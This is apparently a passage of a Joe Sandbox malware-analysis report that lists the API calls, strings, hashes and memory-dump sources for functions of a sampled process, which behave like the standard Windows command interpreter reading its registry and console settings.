Instruction Fuzzy Hash: C0F14E32A48B82C5EA64DF12E4427BAB7A4FF89784F48413AD94DA7754DF3CE445CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF683F84E35), ref: 00007FF683F855DA
RegQueryValueExW.KERNELBASE ref: 00007FF683F85623
RegQueryValueExW.KERNELBASE ref: 00007FF683F85667
RegQueryValueExW.KERNELBASE ref: 00007FF683F856BE
RegQueryValueExW.KERNELBASE ref: 00007FF683F85702
RegQueryValueExW.KERNELBASE ref: 00007FF683F85759
RegQueryValueExW.KERNELBASE ref: 00007FF683F857CF
RegQueryValueExW.KERNELBASE ref: 00007FF683F85862
RegCloseKey.KERNELBASE ref: 00007FF683F8587B
time.MSVCRT ref: 00007FF683F85896
srand.MSVCRT ref: 00007FF683F858A5

Strings

AutoRun, xrefs: 00007FF683F8585B
DelayedExpansion, xrefs: 00007FF683F856B7
DisableUNCCheck, xrefs: 00007FF683F85614
DefaultColor, xrefs: 00007FF683F856FB
PathCompletionChar, xrefs: 00007FF683F857C8
Software\Microsoft\Command Processor, xrefs: 00007FF683F855D3
EnableExtensions, xrefs: 00007FF683F85660
CompletionChar, xrefs: 00007FF683F85752

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction ID: 441308f4a1fb0c4bb5ee4586d15a5d14ea7938de834815cc19245894fa3a6626
Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction Fuzzy Hash: 69E1913262DA82C7EB608F11F45157AB7A0FF88744F48513AEA8EA3A54DF7CD544CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F837D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269
registrythreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F8380B
OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F83821
HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F83845
RegOpenKeyExW.KERNELBASE ref: 00007FF683F83875
GetConsoleOutputCP.KERNELBASE ref: 00007FF683F838BF
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F838DD
memset.MSVCRT ref: 00007FF683F83909
_setjmp.MSVCRT ref: 00007FF683F83952
GetConsoleOutputCP.KERNELBASE ref: 00007FF683F8398B
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F839A2
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F8EA1F
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F8EA2F

Part of subcall function 00007FF683F85920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF683F8B71F), ref: 00007FF683F85997
Part of subcall function 00007FF683F85920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF683F8B71F), ref: 00007FF683F859C5

GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F8EA41

Strings

DisableCMD, xrefs: 00007FF683F8EA18
Software\Policies\Microsoft\Windows\System, xrefs: 00007FF683F83867

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 2624720099-1920437939
Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
Instruction ID: 19f7e1d89ba0d592346e58dfe8be14b8ed3d7dc51a0ee28e646ff2ce5bfe54ad
Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
Instruction Fuzzy Hash: 68C1CD31E48682CAFB18AB26A4131B86AA1FF49744F5C813DD90EF77A1DE3CA441C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F8823C Relevance: 15.1, APIs: 10, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction ID: d6c641ecb066892704d4ac4549624bdc21c12140b09819f205484ab9ba73d512
Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction Fuzzy Hash: 76514D76A09B42C6EB148F12E446579BBA0FF49B91F4C813ACA1EA3750DF3CE454C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82978 Relevance: 9.1, APIs: 6, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction ID: 8d41426a74cf0a472bd4185503e6bff933d93e4bc50d1ab604fb4cfa5acc8c84
Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction Fuzzy Hash: 16514A21B48682D5EB348F16A5462BAA290FF54BE4F4C4239DE6EA77D0DF3CE445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84D9A

Part of subcall function 00007FF683F858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF683F9C6DB), ref: 00007FF683F858EF

SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84DBB
_get_osfhandle.MSVCRT ref: 00007FF683F84DCA
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84DE0
_get_osfhandle.MSVCRT ref: 00007FF683F84DEE
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84E04

Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F80589
Part of subcall function 00007FF683F80580: SetConsoleMode.KERNELBASE ref: 00007FF683F8059E
Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F805AF
Part of subcall function 00007FF683F80580: GetConsoleMode.KERNELBASE ref: 00007FF683F805C5
Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F805EF
Part of subcall function 00007FF683F80580: GetConsoleMode.KERNELBASE ref: 00007FF683F80605
Part of subcall function 00007FF683F80580: _get_osfhandle.MSVCRT ref: 00007FF683F80632
Part of subcall function 00007FF683F80580: SetConsoleMode.KERNELBASE ref: 00007FF683F80647

Part of subcall function 00007FF683F84A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A28
Part of subcall function 00007FF683F84A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A66
Part of subcall function 00007FF683F84A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A7D
Part of subcall function 00007FF683F84A14: memmove.MSVCRT(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84A9A
Part of subcall function 00007FF683F84A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF683F849F1), ref: 00007FF683F84AA2

Part of subcall function 00007FF683F84AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F78798), ref: 00007FF683F84AD6
Part of subcall function 00007FF683F84AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F78798), ref: 00007FF683F84AEF

Part of subcall function 00007FF683F85554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF683F84E35), ref: 00007FF683F855DA
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F85623
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F85667
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F856BE
Part of subcall function 00007FF683F85554: RegQueryValueExW.KERNELBASE ref: 00007FF683F85702

GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84E35
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84E81
GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84F69
GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84F95
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FB0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FC1
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FD8
GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F84FF8
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F85037
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F8504B
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F850DF
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F850F2
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F8510F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F85130
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F8514A
free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF683F85175

Part of subcall function 00007FF683F83578: _get_osfhandle.MSVCRT ref: 00007FF683F83584
Part of subcall function 00007FF683F83578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F8359C
Part of subcall function 00007FF683F83578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835C3
Part of subcall function 00007FF683F83578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835D9
Part of subcall function 00007FF683F83578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F835ED
Part of subcall function 00007FF683F83578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF683F732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF683F83602

Strings

SetConsoleInputExeNameW, xrefs: 00007FF683F85143
IsDebuggerPresent, xrefs: 00007FF683F85122
KERNEL32.DLL, xrefs: 00007FF683F850EB
CopyFileExW, xrefs: 00007FF683F85108

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
API String ID: 3614140610-3021193919
Opcode ID: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction ID: 23b0401f07aa73ff9a8488081d4f34875d8c4d3c3dfee07e56da378f0a27a011
Opcode Fuzzy Hash: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction Fuzzy Hash: 83C15E61A49A43D6FA089B12E8121B977A1FF89B91F4C813DD90EA77A5DF3CE445C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F83C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F83D0C
towupper.MSVCRT ref: 00007FF683F83D2F
iswalpha.MSVCRT ref: 00007FF683F83D4F
towupper.MSVCRT ref: 00007FF683F83D75
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F83DBF
GetFileAttributesW.KERNELBASE ref: 00007FF683F83E7E
GetFileAttributesW.KERNELBASE ref: 00007FF683F83EE9
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F83F32
_local_unwind.MSVCRT ref: 00007FF683F84062
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F84067
_local_unwind.MSVCRT ref: 00007FF683F84098
_local_unwind.MSVCRT ref: 00007FF683F840B3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F840B8
_local_unwind.MSVCRT ref: 00007FF683F840DE
_local_unwind.MSVCRT ref: 00007FF683F840F9
_local_unwind.MSVCRT ref: 00007FF683F84114

Strings

:, xrefs: 00007FF683F83D89

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
String ID: :
API String ID: 1809961153-336475711
Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction ID: 2f3dfcbc0ace6a3a57c2bcf7e3d8732cc037ef81520d573e9e57917ddceed6fb
Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction Fuzzy Hash: E5D18136A4DB85C1EE28DB16E4562BAB7A1FF89740F48413AD94E937A4DF3CE444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F82394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF683F823F1

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF683F82438

Part of subcall function 00007FF683F8081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F8084E

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F824DD
wcschr.MSVCRT ref: 00007FF683F8E12A
_wcsupr.MSVCRT ref: 00007FF683F8E146

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF683F8E0F4
COMSPEC, xrefs: 00007FF683F82483, 00007FF683F8E28B
PATHEXT, xrefs: 00007FF683F82459, 00007FF683F8E0FB
$P$G, xrefs: 00007FF683F82516
PROMPT, xrefs: 00007FF683F8246E, 00007FF683F8251D
\CMD.EXE, xrefs: 00007FF683F8E22A
KEYS, xrefs: 00007FF683F82498
PATH, xrefs: 00007FF683F82444, 00007FF683F8E0E2

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 2622545777-4197029667
Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction ID: eaad19f855abd7a193a2fa8cb4d5a21f0a7e8cb9c56eea5b8a4d39060127d6d9
Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction Fuzzy Hash: CE916D62B49B82D5EE288F11D8562F863A1FF58B84F88413DC90EA77A5DF3CE505C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F80580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F80589
SetConsoleMode.KERNELBASE ref: 00007FF683F8059E
_get_osfhandle.MSVCRT ref: 00007FF683F805AF
GetConsoleMode.KERNELBASE ref: 00007FF683F805C5
_get_osfhandle.MSVCRT ref: 00007FF683F805EF
GetConsoleMode.KERNELBASE ref: 00007FF683F80605
_get_osfhandle.MSVCRT ref: 00007FF683F80632
SetConsoleMode.KERNELBASE ref: 00007FF683F80647
_get_osfhandle.MSVCRT ref: 00007FF683F80684
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F80699
_get_osfhandle.MSVCRT ref: 00007FF683F8D891
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F8D8A6

Strings

CMD.EXE, xrefs: 00007FF683F8065F

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction ID: 07029f768d5bd95390eb9d2d669cec95c23066216748ae7d001b4343f42a15c5
Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction Fuzzy Hash: 1141FC75A09643DBEA184B15E8561B87AA0FF8AB55F8C813DD90FE73A0DF3CA414C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleTitleW.KERNELBASE ref: 00007FF683F7C65E
wcschr.MSVCRT ref: 00007FF683F7C792

Strings

:, xrefs: 00007FF683F7C9E2
/, xrefs: 00007FF683F7CA1B

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleTitlewcschr
String ID: /$:
API String ID: 2364928044-4222935259
Opcode ID: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
